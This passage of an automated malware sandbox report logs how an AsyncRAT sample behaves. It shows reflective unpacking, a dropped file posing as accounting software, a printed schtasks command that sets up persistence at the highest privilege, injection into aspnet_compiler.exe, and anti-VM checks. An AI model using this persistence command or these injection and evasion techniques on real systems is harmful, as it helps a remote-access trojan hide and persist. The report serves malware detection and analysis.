            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: EGSh5caf8a.exeStatic PE information: certificate valid
            Source: EGSh5caf8a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: EGSh5caf8a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: EGSh5caf8a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: EGSh5caf8a.exe, 0.cs.Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: Accounts_Ledger_Software.eXE.0.dr, 0.cs.Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: 0.2.EGSh5caf8a.exe.38f6b90.1.raw.unpack, 0.cs.Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: EGSh5caf8a.exeStatic PE information: 0xBC79720B [Sat Mar 15 02:20:59 2070 UTC]
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeCode function: 0_2_02794F54 pushad ; retf 0_2_02794F55
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeFile created: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXEJump to dropped file

            Boot Survival

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 20991
            Source: unknownNetwork traffic detected: HTTP traffic on port 20991 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 20991
            Source: unknownNetwork traffic detected: HTTP traffic on port 20991 -> 49709
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Yara detected AsyncRAT
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 597345Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeWindow / User API: threadDelayed 2647Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeWindow / User API: threadDelayed 3812Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 6664Thread sleep time: -1100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7220Thread sleep count: 2647 > 30Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99729s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99386s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7260Thread sleep count: 3812 > 30Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99278s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99122s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -99015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98574s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98030s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -597345s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7244Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 4044Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 50000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99844Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99729Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99609Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99500Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99386Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99278Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99890Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99780Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99672Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99562Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99453Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99344Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99234Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99122Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99015Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98906Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98797Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98688Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98574Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98469Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98359Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98250Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98141Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98030Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97922Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97703Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97594Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97484Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 597345Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: EGSh5caf8a.exe, 00000000.00000002.1313648558.0000000000AED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 886008Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
